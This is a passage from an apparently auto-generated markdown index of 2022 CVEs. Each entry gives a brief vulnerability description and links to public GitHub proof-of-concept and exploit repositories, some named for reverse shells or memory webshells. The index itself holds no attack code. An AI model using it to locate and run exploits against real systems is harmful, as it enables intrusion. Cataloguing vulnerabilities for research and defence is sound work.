Linux kernel before 5.16.10. The USB Gadget subsystem lacks certain validation of interface OS descriptor requests (ones with a large array index and ones associated with NULL function pointer retrieval). Memory corruption might occur. + + +- [szymonh/d-os-descriptor](https://github.com/szymonh/d-os-descriptor) + +### CVE-2022-25260 (2022-02-25) + +JetBrains Hub before 2021.1.14276 was vulnerable to blind Server-Side Request Forgery (SSRF). + + +- [yuriisanin/CVE-2022-25260](https://github.com/yuriisanin/CVE-2022-25260) + +### CVE-2022-25262 (2022-02-25) + +In JetBrains Hub before 2022.1.14434, SAML request takeover was possible. + + +- [yuriisanin/CVE-2022-25262](https://github.com/yuriisanin/CVE-2022-25262) + +### CVE-2022-25265 (2022-02-16) + +In the Linux kernel through 5.16.10, certain binary files may have the exec-all attribute if they were built in approximately 2003 (e.g., with GCC 3.2.2 and Linux kernel 2.4.20). This can cause execution of bytes located in supposedly non-executable regions of a file. + + +- [x0reaxeax/exec-prot-bypass](https://github.com/x0reaxeax/exec-prot-bypass) + +### CVE-2022-25313 (2022-02-18) + +In Expat (aka libexpat) before 2.4.5, an attacker can trigger stack exhaustion in build_model via a large nesting depth in the DTD element. + + +- [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25313) +- [Trinadh465/external_expat-2.1.0_CVE-2022-25313](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-25313) + +### CVE-2022-25314 (2022-02-18) + +In Expat (aka libexpat) before 2.4.5, there is an integer overflow in copyString. + + +- [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25314](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25314) + +### CVE-2022-25315 (2022-02-18) + +In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames. + + +- [ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315](https://github.com/ShaikUsaf/external_expact_AOSP10_r33_CVE-2022-25315) +- [hshivhare67/external_expat_v2.1.0_CVE-2022-25315](https://github.com/hshivhare67/external_expat_v2.1.0_CVE-2022-25315) + +### CVE-2022-25365 (2022-02-19) + +Docker Desktop before 4.5.1 on Windows allows attackers to move arbitrary files. NOTE: this issue exists because of an incomplete fix for CVE-2022-23774. + + +- [followboy1999/CVE-2022-25365](https://github.com/followboy1999/CVE-2022-25365) + +### CVE-2022-25375 (2022-02-20) + +An issue was discovered in drivers/usb/gadget/function/rndis.c in the Linux kernel before 5.16.10. The RNDIS USB gadget lacks validation of the size of the RNDIS_MSG_SET command. Attackers can obtain sensitive information from kernel memory. + + +- [szymonh/rndis-co](https://github.com/szymonh/rndis-co) + +### CVE-2022-25479 (2024-07-02) + +Vulnerability in Realtek RtsPer driver for PCIe Card Reader (RtsPer.sys) before 10.0.22000.21355 and Realtek RtsUer driver for USB Card Reader (RtsUer.sys) before 10.0.22000.31274 allows for the leakage of kernel memory from both the stack and the heap. + + +- [SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN](https://github.com/SpiralBL0CK/CVE-2024-40431-CVE-2022-25479-EOP-CHAIN) + +### CVE-2022-25636 (2022-02-22) + +net/netfilter/nf_dup_netdev.c in the Linux kernel 5.4 through 5.6.10 allows local users to gain privileges because of a heap out-of-bounds write. This is related to nf_tables_offload. + + +- [Bonfee/CVE-2022-25636](https://github.com/Bonfee/CVE-2022-25636) +- [chenaotian/CVE-2022-25636](https://github.com/chenaotian/CVE-2022-25636) +- [veritas501/CVE-2022-25636-PipeVersion](https://github.com/veritas501/CVE-2022-25636-PipeVersion) + +### CVE-2022-25640 (2022-02-24) + +In wolfSSL before 5.2.0, a TLS 1.3 server cannot properly enforce a requirement for mutual authentication. A client can simply omit the certificate_verify message from the handshake, and never present a certificate. + + +- [dim0x69/cve-2022-25640-exploit](https://github.com/dim0x69/cve-2022-25640-exploit) + +### CVE-2022-25765 (2022-09-09) + +The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized. + + +- [PurpleWaveIO/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell](https://github.com/PurpleWaveIO/CVE-2022-25765-pdfkit-Exploit-Reverse-Shell) +- [Wai-Yan-Kyaw/PDFKitExploit](https://github.com/Wai-Yan-Kyaw/PDFKitExploit) +- [LordRNA/CVE-2022-25765](https://github.com/LordRNA/CVE-2022-25765) +- [shamo0/PDFkit-CMD-Injection](https://github.com/shamo0/PDFkit-CMD-Injection) +- [nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765](https://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765) +- [UNICORDev/exploit-CVE-2022-25765](https://github.com/UNICORDev/exploit-CVE-2022-25765) +- [lekosbelas/PDFkit-CMD-Injection](https://github.com/lekosbelas/PDFkit-CMD-Injection) +- [lowercasenumbers/CVE-2022-25765](https://github.com/lowercasenumbers/CVE-2022-25765) + +### CVE-2022-25813 (2022-09-02) + +In Apache OFBiz, versions 18.12.05 and earlier, an attacker acting as an anonymous user of the ecommerce plugin, can insert a malicious content in a message “Subject” field from the "Contact us" page. Then a party manager needs to list the communications in the party component to activate the SSTI. A RCE is then possible. + + +- [mbadanoiu/CVE-2022-25813](https://github.com/mbadanoiu/CVE-2022-25813) + +### CVE-2022-25845 (2022-06-10) + +The package com.alibaba:fastjson before 1.2.83 are vulnerable to Deserialization of Untrusted Data by bypassing the default autoType shutdown restrictions, which is possible under certain conditions. Exploiting this vulnerability allows attacking remote servers. Workaround: If upgrading is not possible, you can enable [safeMode](https://github.com/alibaba/fastjson/wiki/fastjson_safemode). + + +- [hosch3n/FastjsonVulns](https://github.com/hosch3n/FastjsonVulns) +- [nerowander/CVE-2022-25845-exploit](https://github.com/nerowander/CVE-2022-25845-exploit) +- [scabench/fastjson-tp1fn1](https://github.com/scabench/fastjson-tp1fn1) +- [luelueking/CVE-2022-25845-In-Spring](https://github.com/luelueking/CVE-2022-25845-In-Spring) +- [ph0ebus/CVE-2022-25845-In-Spring](https://github.com/ph0ebus/CVE-2022-25845-In-Spring) + +### CVE-2022-25927 (2023-01-25) + +Versions of the package ua-parser-js from 0.7.30 and before 0.7.33, from 0.8.1 and before 1.0.33 are vulnerable to Regular Expression Denial of Service (ReDoS) via the trim() function.\r\r + + +- [masahiro331/cve-2022-25927](https://github.com/masahiro331/cve-2022-25927) + +### CVE-2022-25943 (2022-03-09) + +The installer of WPS Office for Windows versions prior to v11.2.0.10258 fails to configure properly the ACL for the directory where the service program is installed. + + +- [HadiMed/KINGSOFT-WPS-Office-LPE](https://github.com/HadiMed/KINGSOFT-WPS-Office-LPE) +- [webraybtl/CVE-2022-25943](https://github.com/webraybtl/CVE-2022-25943) + +### CVE-2022-25949 (2022-03-17) + +The kernel mode driver kwatch3 of KINGSOFT Internet Security 9 Plus Version 2010.06.23.247 fails to properly handle crafted inputs, leading to stack-based buffer overflow. + + +- [tandasat/CVE-2022-25949](https://github.com/tandasat/CVE-2022-25949) + +### CVE-2022-26133 (2022-04-20) + +SharedSecretClusterAuthenticator in Atlassian Bitbucket Data Center versions 5.14.0 and later before 7.6.14, 7.7.0 and later prior to 7.17.6, 7.18.0 and later prior to 7.18.4, 7.19.0 and later prior to 7.19.4, and 7.20.0 allow a remote, unauthenticated attacker to execute arbitrary code via Java deserialization. + + +- [Pear1y/CVE-2022-26133](https://github.com/Pear1y/CVE-2022-26133) +- [0xAbbarhSF/CVE-2022-26133](https://github.com/0xAbbarhSF/CVE-2022-26133) + +### CVE-2022-26134 (2022-06-03) + +In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1. + + +- [W01fh4cker/Serein](https://github.com/W01fh4cker/Serein) +- [offlinehoster/CVE-2022-26134](https://github.com/offlinehoster/CVE-2022-26134) +- [ma1am/CVE-2022-26134-Exploit-Detection](https://github.com/ma1am/CVE-2022-26134-Exploit-Detection) +- [jbaines-r7/through_the_wire](https://github.com/jbaines-r7/through_the_wire) +- [crowsec-edtech/CVE-2022-26134](https://github.com/crowsec-edtech/CVE-2022-26134) +- [kyxiaxiang/CVE-2022-26134](https://github.com/kyxiaxiang/CVE-2022-26134) +- [Brucetg/CVE-2022-26134](https://github.com/Brucetg/CVE-2022-26134) +- [shamo0/CVE-2022-26134](https://github.com/shamo0/CVE-2022-26134) +- [SNCKER/CVE-2022-26134](https://github.com/SNCKER/CVE-2022-26134) +- [Vulnmachines/Confluence-CVE-2022-26134](https://github.com/Vulnmachines/Confluence-CVE-2022-26134) +- [axingde/CVE-2022-26134](https://github.com/axingde/CVE-2022-26134) +- [0xAgun/CVE-2022-26134](https://github.com/0xAgun/CVE-2022-26134) +- [abhishekmorla/CVE-2022-26134](https://github.com/abhishekmorla/CVE-2022-26134) +- [hev0x/CVE-2022-26134](https://github.com/hev0x/CVE-2022-26134) +- [archanchoudhury/Confluence-CVE-2022-26134](https://github.com/archanchoudhury/Confluence-CVE-2022-26134) +- [SIFalcon/confluencePot](https://github.com/SIFalcon/confluencePot) +- [vesperp/CVE-2022-26134-Confluence](https://github.com/vesperp/CVE-2022-26134-Confluence) +- [li8u99/CVE-2022-26134](https://github.com/li8u99/CVE-2022-26134) +- [reubensammut/cve-2022-26134](https://github.com/reubensammut/cve-2022-26134) +- [BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL](https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL) +- [alcaparra/CVE-2022-26134](https://github.com/alcaparra/CVE-2022-26134) +- [whokilleddb/CVE-2022-26134-Confluence-RCE](https://github.com/whokilleddb/CVE-2022-26134-Confluence-RCE) +- [Habib0x0/CVE-2022-26134](https://github.com/Habib0x0/CVE-2022-26134) +- [Y000o/Confluence-CVE-2022-26134](https://github.com/Y000o/Confluence-CVE-2022-26134) +- [redhuntlabs/ConfluentPwn](https://github.com/redhuntlabs/ConfluentPwn) +- [cai-niao98/CVE-2022-26134](https://github.com/cai-niao98/CVE-2022-26134) +- [sunny-kathuria/exploit_CVE-2022-26134](https://github.com/sunny-kathuria/exploit_CVE-2022-26134) +- [KeepWannabe/BotCon](https://github.com/KeepWannabe/BotCon) +- [Chocapikk/CVE-2022-26134](https://github.com/Chocapikk/CVE-2022-26134) +- [AmoloHT/CVE-2022-26134](https://github.com/AmoloHT/CVE-2022-26134) +- [kh4sh3i/CVE-2022-26134](https://github.com/kh4sh3i/CVE-2022-26134) +- [ColdFusionX/CVE-2022-26134](https://github.com/ColdFusionX/CVE-2022-26134) +- [Luchoane/CVE-2022-26134_conFLU](https://github.com/Luchoane/CVE-2022-26134_conFLU) +- [r1skkam/TryHackMe-Atlassian-CVE-2022-26134](https://github.com/r1skkam/TryHackMe-Atlassian-CVE-2022-26134) +- [nxtexploit/CVE-2022-26134](https://github.com/nxtexploit/CVE-2022-26134) +- [Debajyoti0-0/CVE-2022-26134](https://github.com/Debajyoti0-0/CVE-2022-26134) +- [f4yd4-s3c/cve-2022-26134](https://github.com/f4yd4-s3c/cve-2022-26134) +- [coskper-papa/CVE-2022-26134](https://github.com/coskper-papa/CVE-2022-26134) +- [p4b3l1t0/confusploit](https://github.com/p4b3l1t0/confusploit) +- [twoning/CVE-2022-26134-PoC](https://github.com/twoning/CVE-2022-26134-PoC) +- [iveresk/cve-2022-26134](https://github.com/iveresk/cve-2022-26134) +- [keven1z/CVE-2022-26134](https://github.com/keven1z/CVE-2022-26134) +- [shiftsansan/CVE-2022-26134-Console](https://github.com/shiftsansan/CVE-2022-26134-Console) +- [1337in/CVE-2022-26134web](https://github.com/1337in/CVE-2022-26134web) +- [skhalsa-sigsci/CVE-2022-26134-LAB](https://github.com/skhalsa-sigsci/CVE-2022-26134-LAB) +- [yigexioabai/CVE-2022-26134-cve1](https://github.com/yigexioabai/CVE-2022-26134-cve1) +- [kailing0220/CVE-2022-26134](https://github.com/kailing0220/CVE-2022-26134) +- [xanszZZ/ATLASSIAN-Confluence_rce](https://github.com/xanszZZ/ATLASSIAN-Confluence_rce) +- [kelemaoya/CVE-2022-26134](https://github.com/kelemaoya/CVE-2022-26134) +- [CJ-0107/cve-2022-26134](https://github.com/CJ-0107/cve-2022-26134) +- [latings/CVE-2022-26134](https://github.com/latings/CVE-2022-26134) +- [yyqxi/CVE-2022-26134](https://github.com/yyqxi/CVE-2022-26134) +- [b4dboy17/CVE-2022-26134](https://github.com/b4dboy17/CVE-2022-26134) +- [wjlin0/CVE-2022-26134](https://github.com/wjlin0/CVE-2022-26134) +- [cbk914/CVE-2022-26134_check](https://github.com/cbk914/CVE-2022-26134_check) +- [MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell](https://github.com/MaskCyberSecurityTeam/CVE-2022-26134_Behinder_MemShell) +- [Muhammad-Ali007/Atlassian_CVE-2022-26134](https://github.com/Muhammad-Ali007/Atlassian_CVE-2022-26134) +- [acfirthh/CVE-2022-26134](https://github.com/acfirthh/CVE-2022-26134) +- [yTxZx/CVE-2022-26134](https://github.com/yTxZx/CVE-2022-26134) +- [DARKSTUFF-LAB/-CVE-2022-26134](https://github.com/DARKSTUFF-LAB/-CVE-2022-26134) +- [404fu/CVE-2022-26134-POC](https://github.com/404fu/CVE-2022-26134-POC) +- [xsxtw/CVE-2022-26134](https://github.com/xsxtw/CVE-2022-26134) +- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE) +- [cc3305/CVE-2022-26134](https://github.com/cc3305/CVE-2022-26134) +- [Agentgilspy/CVE-2022-26134](https://github.com/Agentgilspy/CVE-2022-26134) +- [XiaomingX/cve-2022-26134-poc](https://github.com/XiaomingX/cve-2022-26134-poc) + +### CVE-2022-26135 (2022-06-30) + +A vulnerability in Mobile Plugin for Jira Data Center and Server allows a remote, authenticated user (including a user who joined via the sign-up feature) to perform a full read server-side request forgery via a batch endpoint. This affects Atlassian Jira Server and Data Center from version 8.0.0 before version 8.13.22, from version 8.14.0 before 8.20.10, from version 8.21.0 before 8.22.4. This also affects Jira Management Server and Data Center versions from version 4.0.0 before 4.13.22, from version 4.14.0 before 4.20.10 and from version 4.21.0 before 4.22.4. + + +- [assetnote/jira-mobile-ssrf-exploit](https://github.com/assetnote/jira-mobile-ssrf-exploit) +- [safe3s/CVE-2022-26135](https://github.com/safe3s/CVE-2022-26135) + +### CVE-2022-26138 (2022-07-20) + +The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app. + + +- [alcaparra/CVE-2022-26138](https://github.com/alcaparra/CVE-2022-26138) +- [Vulnmachines/Confluence-Question-CVE-2022-26138-](https://github.com/Vulnmachines/Confluence-Question-CVE-2022-26138-) +- [z92g/CVE-2022-26138](https://github.com/z92g/CVE-2022-26138) +- [shavchen/CVE-2022-26138](https://github.com/shavchen/CVE-2022-26138) + +### CVE-2022-26159 (2022-02-28) + +The auto-completion plugin in Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/<domain>/en.xml (and similar pathnames for other languages), which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. + + +- [p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML](https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML) + +### CVE-2022-26265 (2022-03-18) + +Contao Managed Edition v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the component php_cli parameter. + + +- [Inplex-sys/CVE-2022-26265](https://github.com/Inplex-sys/CVE-2022-26265) +- [redteamsecurity2023/CVE-2022-26265](https://github.com/redteamsecurity2023/CVE-2022-26265) + +### CVE-2022-26269 (2022-03-29) + +Suzuki Connect v1.0.15 allows attackers to tamper with displayed messages via spoofed CAN messages. + + +- [nsbogam/CVE-2022-26269](https://github.com/nsbogam/CVE-2022-26269) + +### CVE-2022-26318 (2022-03-04) + +On WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code, aka FBX-22786. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2. + + +- [misterxid/watchguard_cve-2022-26318](https://github.com/misterxid/watchguard_cve-2022-26318) +- [h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318](https://github.com/h3llk4t3/Watchguard-RCE-POC-CVE-2022-26318) +- [BabyTeam1024/CVE-2022-26318](https://github.com/BabyTeam1024/CVE-2022-26318) + +### CVE-2022-26377 (2022-06-08) + +Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.53 and prior versions. + + +- [watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc](https://github.com/watchtowrlabs/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc) + +### CVE-2022-26485 (2022-12-22) + +Removing an XSLT parameter during processing could have lead to an exploitable use-after-free. We have had reports of attacks in the wild abusing this flaw. This vulnerability affects Firefox < 97.0.2, Firefox ESR < 91.6.1, Firefox for Android < 97.3.0, Thunderbird < 91.6.2, and Focus < 97.3.0. + + +- [mistymntncop/CVE-2022-26485](https://github.com/mistymntncop/CVE-2022-26485) + +### CVE-2022-26488 (2022-03-07) + +In Python before 3.10.3 on Windows, local users can gain privileges because the search path is inadequately secured. The installer may allow a local attacker to add user-writable directories to the system search path. To exploit, an administrator must have installed Python for all users and enabled PATH entries. A non-administrative user can trigger a repair that incorrectly adds user-writable paths into PATH, enabling search-path hijacking of other users and system services. This affects Python (CPython) through 3.7.12, 3.8.x through 3.8.12, 3.9.x through 3.9.10, and 3.10.x through 3.10.2. + + +- [techspence/PyPATHPwner](https://github.com/techspence/PyPATHPwner) + +### CVE-2022-26503 (2022-03-17) + +Deserialization of untrusted data in Veeam Agent for Windows 2.0, 2.1, 2.2, 3.0.2, 4.x, and 5.x allows local users to run arbitrary code with local system privileges. + + +- [sinsinology/CVE-2022-26503](https://github.com/sinsinology/CVE-2022-26503) + +### CVE-2022-26629 (2022-03-24) + +An Access Control vulnerability exists in SoroushPlus+ Messenger 1.0.30 in the Lock Screen Security Feature function due to insufficient permissions and privileges, which allows a malicious attacker bypass the lock screen function. + + +- [scopion/CVE-2022-26629](https://github.com/scopion/CVE-2022-26629) +- [sysenter-eip/CVE-2022-26629](https://github.com/sysenter-eip/CVE-2022-26629) + +### CVE-2022-26717 (2022-11-01) + +A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, watchOS 8.6, iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, Safari 15.5, iTunes 12.12.4 for Windows. Processing maliciously crafted web content may lead to arbitrary code execution. + + +- [theori-io/CVE-2022-26717-Safari-WebGL-Exploit](https://github.com/theori-io/CVE-2022-26717-Safari-WebGL-Exploit) + +### CVE-2022-26726 (2022-05-26) + +This issue was addressed with improved checks. This issue is fixed in Security Update 2022-004 Catalina, watchOS 8.6, macOS Monterey 12.4, macOS Big Sur 11.6.6. An app may be able to capture a user's screen. + + +- [acheong08/CVE-2022-26726-POC](https://github.com/acheong08/CVE-2022-26726-POC) +- [acheong08/CVE-2022-26726-POC2](https://github.com/acheong08/CVE-2022-26726-POC2) + +### CVE-2022-26757 (2022-05-26) + +A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, Security Update 2022-004 Catalina, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. An application may be able to execute arbitrary code with kernel privileges. + + +- [Dylbin/flow_divert](https://github.com/Dylbin/flow_divert) + +### CVE-2022-26763 (2022-05-26) + +An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, Security Update 2022-004 Catalina, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. A malicious application may be able to execute arbitrary code with system privileges. + + +- [zhuowei/PCICrash](https://github.com/zhuowei/PCICrash) + +### CVE-2022-26766 (2022-05-26) + +A certificate parsing issue was addressed with improved checks. This issue is fixed in tvOS 15.5, iOS 15.5 and iPadOS 15.5, Security Update 2022-004 Catalina, watchOS 8.6, macOS Big Sur 11.6.6, macOS Monterey 12.4. A malicious app may be able to bypass signature validation. + + +- [zhuowei/CoreTrustDemo](https://github.com/zhuowei/CoreTrustDemo) + +### CVE-2022-26809 (2022-04-15) + +Remote Procedure Call Runtime Remote Code Execution Vulnerability + + +- [sherlocksecurity/Microsoft-CVE-2022-26809-The-Little-Boy](https://github.com/sherlocksecurity/Microsoft-CVE-2022-26809-The-Little-Boy) +- [websecnl/CVE-2022-26809](https://github.com/websecnl/CVE-2022-26809) +- [auduongxuan/CVE-2022-26809](https://github.com/auduongxuan/CVE-2022-26809) +- [corelight/cve-2022-26809](https://github.com/corelight/cve-2022-26809) +- [quijadajose/CVE-2022-26809-RCE](https://github.com/quijadajose/CVE-2022-26809-RCE) +- [oppongjohn/CVE-2022-26809-RCE](https://github.com/oppongjohn/CVE-2022-26809-RCE) +- [yuanLink/CVE-2022-26809](https://github.com/yuanLink/CVE-2022-26809) +- [s1ckb017/PoC-CVE-2022-26809](https://github.com/s1ckb017/PoC-CVE-2022-26809) +- [fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp](https://github.com/fuckjsonp/FuckJsonp-RCE-CVE-2022-26809-SQL-XSS-FuckJsonp) +- [michealadams30/Cve-2022-26809](https://github.com/michealadams30/Cve-2022-26809) + +### CVE-2022-26923 (2022-05-10) + +Active Directory Domain Services Elevation of Privilege Vulnerability + + +- [r1skkam/TryHackMe-CVE-2022-26923](https://github.com/r1skkam/TryHackMe-CVE-2022-26923) +- [LudovicPatho/CVE-2022-26923_AD-Certificate-Services](https://github.com/LudovicPatho/CVE-2022-26923_AD-Certificate-Services) +- [lsecqt/CVE-2022-26923-Powershell-POC](https://github.com/lsecqt/CVE-2022-26923-Powershell-POC) +- [evilashz/PIGADVulnScanner](https://github.com/evilashz/PIGADVulnScanner) +- [Gh-Badr/CVE-2022-26923](https://github.com/Gh-Badr/CVE-2022-26923) +- [Yowise/CVE-2022-26923](https://github.com/Yowise/CVE-2022-26923) + +### CVE-2022-26927 (2022-05-10) + +Windows Graphics Component Remote Code Execution Vulnerability + + +- [CrackerCat/CVE-2022-26927](https://github.com/CrackerCat/CVE-2022-26927) + +### CVE-2022-26937 (2022-05-10) + +Windows Network File System Remote Code Execution Vulnerability + + +- [corelight/CVE-2022-26937](https://github.com/corelight/CVE-2022-26937) +- [omair2084/CVE-2022-26937](https://github.com/omair2084/CVE-2022-26937) +- [Malwareman007/CVE-2022-26937](https://github.com/Malwareman007/CVE-2022-26937) + +### CVE-2022-26965 (2022-03-18) + +In Pluck 4.7.16, an admin user can use the theme upload functionality at /admin.php?action=themeinstall to perform remote code execution. + + +- [SkDevilS/Pluck-Exploitation-by-skdevils](https://github.com/SkDevilS/Pluck-Exploitation-by-skdevils) + +### CVE-2022-27134 (2022-05-12) + +EOSIO batdappboomx v327c04cf has an Access-control vulnerability in the `transfer` function of the smart contract which allows remote attackers to win the cryptocurrency without paying ticket fee via the `std::string memo` parameter. + + +- [Kenun99/CVE-batdappboomx](https://github.com/Kenun99/CVE-batdappboomx) + +### CVE-2022-27226 (2022-03-19) + +A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor's defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router's default credentials aren't rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction. + + +- [SakuraSamuraii/ez-iRZ](https://github.com/SakuraSamuraii/ez-iRZ) + +### CVE-2022-27251 +- [TheCyberGeek/CVE-2022-27251](https://github.com/TheCyberGeek/CVE-2022-27251) + +### CVE-2022-27254 (2022-03-23) + +The remote keyless system on Honda Civic 2018 vehicles sends the same RF signal for each door-open request, which allows for a replay attack, a related issue to CVE-2019-20626. + + +- [nonamecoder/CVE-2022-27254](https://github.com/nonamecoder/CVE-2022-27254) + +### CVE-2022-27255 (2022-08-01) + +In Realtek eCos RSDK 1.5.7p1 and MSDK 4.9.4p1, the SIP ALG function that rewrites SDP data has a stack-based buffer overflow. This allows an attacker to remotely execute code without authentication via a crafted SIP packet that contains malicious SDP data. + + +- [infobyte/cve-2022-27255](https://github.com/infobyte/cve-2022-27255) +- [stryker-project/CVE-2022-27255-checker](https://github.com/stryker-project/CVE-2022-27255-checker) + +### CVE-2022-27413 (2022-05-03) + +Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the adminname parameter in admin.php. + + +- [HH1F/CVE-2022-27413](https://github.com/HH1F/CVE-2022-27413) + +### CVE-2022-27414 +- [lus33rr/CVE-2022-27414](https://github.com/lus33rr/CVE-2022-27414) + +### CVE-2022-27434 (2022-07-17) + +UNIT4 TETA Mobile Edition (ME) before 29.5.HF17 was discovered to contain a SQL injection vulnerability via the ProfileName parameter in the errorReporting page. + + +- [LongWayHomie/CVE-2022-27434](https://github.com/LongWayHomie/CVE-2022-27434) + +### CVE-2022-27438 (2022-06-06) + +Caphyon Ltd Advanced Installer 19.3 and earlier and many products that use the updater from Advanced Installer (Advanced Updater) are affected by a remote code execution vulnerability via the CustomDetection parameter in the update check function. To exploit this vulnerability, a user must start an affected installation to trigger the update check. + + +- [gerr-re/cve-2022-27438](https://github.com/gerr-re/cve-2022-27438) + +### CVE-2022-27499 (2022-11-11) + +Premature release of resource during expected lifetime in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access. + + +- [StanPlatinum/snapshot-attack-demo](https://github.com/StanPlatinum/snapshot-attack-demo) + +### CVE-2022-27502 (2022-06-10) + +RealVNC VNC Server 6.9.0 through 5.1.0 for Windows allows local privilege escalation because an installer repair operation executes %TEMP% files as SYSTEM. + + +- [alirezac0/CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502) + +### CVE-2022-27518 (2022-12-13) + +Unauthenticated remote arbitrary code execution\n + + +- [dolby360/CVE-2022-27518_POC](https://github.com/dolby360/CVE-2022-27518_POC) + +### CVE-2022-27646 (2023-03-29) + +This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700v3 1.0.4.120_10.0.91 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the circled daemon. A crafted circleinfo.txt file can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15879. + + +- [cyber-defence-campus/netgear_r6700v3_circled](https://github.com/cyber-defence-campus/netgear_r6700v3_circled) + +### CVE-2022-27665 (2023-04-03) + +Reflected XSS (via AngularJS sandbox escape expressions) exists in Progress Ipswitch WS_FTP Server 8.6.0. This can lead to execution of malicious code and commands on the client due to improper handling of user-provided input. By inputting malicious payloads in the subdirectory searchbar or Add folder filename boxes, it is possible to execute client-side commands. For example, there is Client-Side Template Injection via subFolderPath to the ThinClient/WtmApiService.asmx/GetFileSubTree URI. + + +- [dievus/CVE-2022-27665](https://github.com/dievus/CVE-2022-27665) + +### CVE-2022-27666 (2022-03-23) + +A heap buffer overflow flaw was found in IPsec ESP transformation code in net/ipv4/esp4.c and net/ipv6/esp6.c. This flaw allows a local attacker with a normal user privilege to overwrite kernel heap objects and may cause a local privilege escalation threat. + + +- [plummm/CVE-2022-27666](https://github.com/plummm/CVE-2022-27666) +- [Albocoder/cve-2022-27666-exploits](https://github.com/Albocoder/cve-2022-27666-exploits) + +### CVE-2022-27772 (2022-03-30) + +spring-boot versions prior to version v2.2.11.RELEASE was vulnerable to temporary directory hijacking. This vulnerability impacted the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer + + +- [puneetbehl/grails3-cve-2022-27772](https://github.com/puneetbehl/grails3-cve-2022-27772) + +### CVE-2022-27925 (2022-04-20) + +Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal. + + +- [vnhacker1337/CVE-2022-27925-PoC](https://github.com/vnhacker1337/CVE-2022-27925-PoC) +- [mohamedbenchikh/CVE-2022-27925](https://github.com/mohamedbenchikh/CVE-2022-27925) +- [miko550/CVE-2022-27925](https://github.com/miko550/CVE-2022-27925) +- [navokus/CVE-2022-27925](https://github.com/navokus/CVE-2022-27925) +- [Josexv1/CVE-2022-27925](https://github.com/Josexv1/CVE-2022-27925) +- [Chocapikk/CVE-2022-27925-Revshell](https://github.com/Chocapikk/CVE-2022-27925-Revshell) +- [akincibor/CVE-2022-27925](https://github.com/akincibor/CVE-2022-27925) +- [touchmycrazyredhat/CVE-2022-27925-Revshell](https://github.com/touchmycrazyredhat/CVE-2022-27925-Revshell) +- [jam620/Zimbra](https://github.com/jam620/Zimbra) +- [Inplex-sys/CVE-2022-27925](https://github.com/Inplex-sys/CVE-2022-27925) +- [onlyHerold22/CVE-2022-27925-PoC](https://github.com/onlyHerold22/CVE-2022-27925-PoC) +- [sanan2004/CVE-2022-27925](https://github.com/sanan2004/CVE-2022-27925) + +### 